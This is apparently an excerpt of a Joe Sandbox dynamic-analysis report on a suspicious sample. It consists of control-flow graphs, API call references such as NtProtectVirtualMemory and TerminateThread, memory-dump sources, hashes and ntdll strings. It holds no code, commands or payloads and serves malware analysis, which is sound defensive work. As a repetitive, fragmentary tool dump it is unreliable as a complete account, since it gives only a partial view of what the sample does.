                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: a033f93cd9327fbf42a49b6a505d562c6ba6453b336bd7dd6d4863a57d1a2d28
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: F7613B757013865FEF349E748DB43EA36535F633A0FA842AECC864B284DB758585CB01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 87 2bd2897-2bd2955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02BD2953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 22cb26ee4d1611cb1f560478dd3e01f49a014cee65e1b918811eec5b55f9eee8
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: C00169B02482859FEB28DE28DD487EAB7E7AFD4300F45842DAC899B204C774AE45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction ID: 1fcfe82a3cf65b3437fcb80c44781e03d1ba880334e05b3dd24934ade48d2cb5
                                                                                                                                                      • Opcode Fuzzy Hash: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction Fuzzy Hash: 58314676A80248DFDB289E64DC943D93BA3AF973A0F3801ADDC459B200D7308986CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction ID: bfd98e146032348ff51c58a93f9a397a8ce23c16f79b2abb08b4955542e36477
                                                                                                                                                      • Opcode Fuzzy Hash: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction Fuzzy Hash: C5310F36B443499FDF349E249D947EA37A7AF967A0F64016EDC4A9B200D3318A46CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 83 2bc3c3f-2bcc3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02BCC3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      • Opcode ID: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction ID: 1dbd8f746af16a849e0d299d8e3a7459854aed502779eaabd0c29666e599f833
                                                                                                                                                      • Opcode Fuzzy Hash: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction Fuzzy Hash: 28F02870244782CFCB308E648DE5BDE27665FCA244F90D16DDD494A14AD3350980C606
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph


                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
                                                                                                                                                      • Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
• Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
• Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 57395e-5739a0 2 5739a1-5739a7 0->2 3 5739db-573ad5 TerminateThread 0->3 4 573945-573959 2->4 5 5739a9-5739d5 2->5 9 573c8d-573ca8 3->9 10 573adb-573aea 3->10 4->2 5->3 10->9 11 573af0-573af4 10->11 11->9 12 573afa-573afe 11->12 12->9 13 573b04-573b08 12->13 13->9 14 573b0e-573b12 13->14 14->9 15 573b18-573b1c 14->15 15->9 16 573b22-573b73 15->16 16->9 18 573b79-573b99 16->18 19 573b9a-573bee 18->19 21 573bf0-573bf9 19->21 22 573c0a-573c88 19->22 21->9 23 573bff-573c00 21->23 23->19
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 25 573987-57398e 26 573990-5739a0 25->26 27 57395b 25->27 28 5739a1-5739a7 26->28 29 5739db-573ad5 TerminateThread 26->29 30 5739a6-5739ae 27->30 31 57395d-57395f 27->31 32 573945-573959 28->32 33 5739a9-5739d5 28->33 39 573c8d-573ca8 29->39 40 573adb-573aea 29->40 35 5739b0-5739d5 30->35 36 573939-573942 30->36 31->25 32->28 33->29 35->29 36->32 40->39 41 573af0-573af4 40->41 41->39 42 573afa-573afe 41->42 42->39 43 573b04-573b08 42->43 43->39 44 573b0e-573b12 43->44 44->39 45 573b18-573b1c 44->45 45->39 46 573b22-573b73 45->46 46->39 48 573b79-573b99 46->48 49 573b9a-573bee 48->49 51 573bf0-573bf9 49->51 52 573c0a-573c88 49->52 51->39 53 573bff-573c00 51->53 53->49
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 55 573a0a-573ad5 TerminateThread 60 573c8d-573ca8 55->60 61 573adb-573aea 55->61 61->60 62 573af0-573af4 61->62 62->60 63 573afa-573afe 62->63 63->60 64 573b04-573b08 63->64 64->60 65 573b0e-573b12 64->65 65->60 66 573b18-573b1c 65->66 66->60 67 573b22-573b73 66->67 67->60 69 573b79-573b99 67->69 70 573b9a-573bee 69->70 72 573bf0-573bf9 70->72 73 573c0a-573c88 70->73 72->60 74 573bff-573c00 72->74 74->70
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29298712633.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_573000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8CD2C4
                                                                                                                                                        • Part of subcall function 1E938514: RtlDebugPrintTimes.NTDLL ref: 1E938579
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ,s$p-s
                                                                                                                                                      • API String ID: 3446177414-239768544
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
